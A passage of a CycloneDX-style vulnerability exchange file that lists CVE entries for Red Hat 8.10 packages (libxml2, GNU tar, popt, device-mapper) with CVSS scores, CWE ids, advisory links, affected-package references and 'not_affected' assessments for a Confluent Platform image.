          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-18477",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        367
      ],
      "description": "A TOCTOU (Time-of-Check Time-of-Use) vulnerability in GNU tar's incremental dumpdir 'X' rename handling allows a local attacker with write access to a directory being backed up to influence the restore process if the attacker has access to the system where the restore is being performed. During restoration, files or directories may be created, renamed or overwritten outside the intended extraction directory. This could lead to unauthorized file modification or, in some cases, privilege escalation. Exploitation does not require the attacker to modify or craft the archive, and standard backup and restore workflows\u2014including extracting into a newly created directory without using the -P option do not mitigate the issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-18477"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49361"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-18477"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2509735"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-18477"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-18477"
        }
      ],
      "published": "2026-08-03T17:16:33+00:00",
      "updated": "2026-08-13T16:09:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-18508",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
        }
      ],
      "cwes": [
        59
      ],
      "description": "A flaw was found in GNU tar. When extracting an archive with the --one-top-level option, hardlink targets are not confined to the designated top-level directory and may resolve relative to the extraction working directory. A crafted archive can create hardlinks that escape the intended boundary and, when combined with a preexisting symbolic link under the working directory, may allow writing outside that boundary during a single extraction.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-18508"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50807"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-18508"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2509843"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-18508"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-18508"
        }
      ],
      "published": "2026-08-03T16:16:28+00:00",
      "updated": "2026-08-18T16:36:55+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-18739",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        787
      ],
      "description": "A flaw was found in popt, a command-line option parsing library. An off-by-one error in the poptStuffArgs function, when repeatedly called by a host application or through deep alias nesting, can lead to corruption of internal program data. This corruption could potentially enable a local attacker to execute arbitrary code if the host application then unsafely processes the altered data.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-18739"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56984"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-18739"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2510737"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-18739"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-18739"
        }
      ],
      "published": "2026-08-04T06:16:30+00:00",
      "updated": "2026-08-19T14:17:29+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.18-1.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-18839",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.2,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        191
      ],
      "description": "An integer underflow was found in the popt library when formatting help text for option tables that exceed the terminal width. A local user who can cause an application to print help under those conditions may cause that application to crash or fail to display help, resulting in a denial of service of the affected application.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-18839"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-18839"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2511010"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-18839"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-18839"
        }
      ],
      "published": "2026-08-05T21:16:57+00:00",
      "updated": "2026-08-06T15:37:22+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.18-1.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/popt@1.18-1.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-19617",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        770
      ],
      "description": "A flaw was found in libdm. A local attacker could craft a malicious Logical Volume Manager (LVM) metadata configuration with deeply nested structures. This could lead to uncontrolled recursion in the libdm configuration file parser, exhausting the stack and causing any LVM command reading the metadata to crash. This vulnerability results in a Denial of Service (DoS) for affected systems.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-19617"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-19617"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2514626"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-19617"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-19617"
        }
      ],
      "published": "2026-08-14T06:17:14+00:00",
      "updated": "2026-08-14T19:07:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8",
          "versions": [
            {
              "version": "8:1.02.181-15.el8_10.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8",
          "versions": [
            {
              "version": "8:1.02.181-15.el8_10.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
